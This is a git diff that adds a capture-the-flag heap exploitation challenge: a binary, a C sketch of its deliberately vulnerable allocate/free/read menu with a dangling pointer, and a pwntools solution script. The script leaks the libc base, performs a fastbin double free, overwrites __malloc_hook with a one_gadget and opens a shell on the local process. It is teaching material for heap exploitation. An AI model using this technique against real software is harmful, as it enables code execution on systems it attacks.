diff --git a/FastBin/CaNaKMgF_remastered/CaNaKMgF_remastered b/FastBin/CaNaKMgF_remastered/CaNaKMgF_remastered
new file mode 100755
index 0000000..8cdc797
Binary files /dev/null and b/FastBin/CaNaKMgF_remastered/CaNaKMgF_remastered differ
diff --git a/FastBin/CaNaKMgF_remastered/answer.py b/FastBin/CaNaKMgF_remastered/answer.py
new file mode 100644
index 0000000..9b8d124
--- /dev/null
+++ b/FastBin/CaNaKMgF_remastered/answer.py
@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+# coding = utf-8
+
+# Env: Ubuntu 16.04.7 LTS, GLIBC 2.23-0ubuntu11.3
+
+from pwn import *
+context(arch = "amd64", os = "linux", log_level = "debug")
+context.terminal = ['/usr/bin/tmux', 'splitw', '-h']
+
+p = process('./CaNaKMgF_remastered')
+elf = ELF('./CaNaKMgF_remastered')
+libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
+# gdb.attach(p, "")
+# time.sleep(1)
+
+def menu(option):
+    p.recvuntil("5. Run away\n")
+    p.sendline(option)
+
+def allocate(size, data):
+    menu("1")
+    p.recvuntil("Length? ")
+    p.sendline(f"{size}")
+    p.send(data)
+
+def free(index):
+    menu("3")
+    p.recvuntil("Num? ")
+    p.sendline(f"{index}")
+
+def read(index):
+    menu("4")
+    p.recvuntil("Num? ")
+    p.sendline(f"{index}")
+    data = p.recvuntil("\n1. Allocate\n")
+    return data[:-13]
+
+# Leak libc base
+allocate(0x100, 'a') # 0
+allocate(0x100, 'a') # 1
+free(0)
+main_arena_p0x88 = u64(read(0).ljust(8, b'\x00'))
+print(f"main_arena + 0x88: {hex(main_arena_p0x88)}")
+libc_base = main_arena_p0x88 - 0x3c4b78
+print(f"libc_base: {hex(libc_base)}")
+free(1)
+
+# Double free
+allocate(0x60, 'a') # 2
+allocate(0x60, 'a') # 3
+allocate(0x60, 'a') # 4
+free(2)
+free(3)
+free(2)
+
+# Overwrite __malloc_hook by fake a chunk at (char *)__malloc_hook - 0x23
+__malloc_hook = libc_base + libc.symbols['__malloc_hook']
+
+allocate(0x60, p64(__malloc_hook - 0x23)) # 5
+allocate(0x60, 'a') # 6
+allocate(0x60, 'a') # 7
+
+one_gadget = libc_base + 0xf03a4 # constraints: [rsp+0x50] == NULL
+allocate(0x60, b'a' * 0x13 + p64(one_gadget)) # 8
+free(6)
+free(6)
+
+p.interactive()
\ No newline at end of file
diff --git a/FastBin/CaNaKMgF_remastered/pseudo.c b/FastBin/CaNaKMgF_remastered/pseudo.c
new file mode 100644
index 0000000..b93b8d6
--- /dev/null
+++ b/FastBin/CaNaKMgF_remastered/pseudo.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+char* alloc_list[100];
+unsigned int alloc_idx = 0;
+int main() {
+  unsigned int option, size, index;
+  while (1) {
+    scanf("%u", &option);
+    switch (option) {
+      case 1: { // allocate(size, data)
+        scanf("%u", &size);
+        char *buf = malloc(size);
+        read(0, buf, size);
+        alloc_list[alloc_idx++] = buf;
+        break;
+      }
+      case 3: { // free(index)
+        scanf("%u", &index);
+        free(alloc_list[index]);
+        // alloc_list[index] is a 
+        // dangling pointer now
+        break;
+      }
+      case 4: { // read(index)
+        scanf("%u", &index);
+        puts(alloc_list[index]);
+        break;
+      }
+    }
+  }
+}
+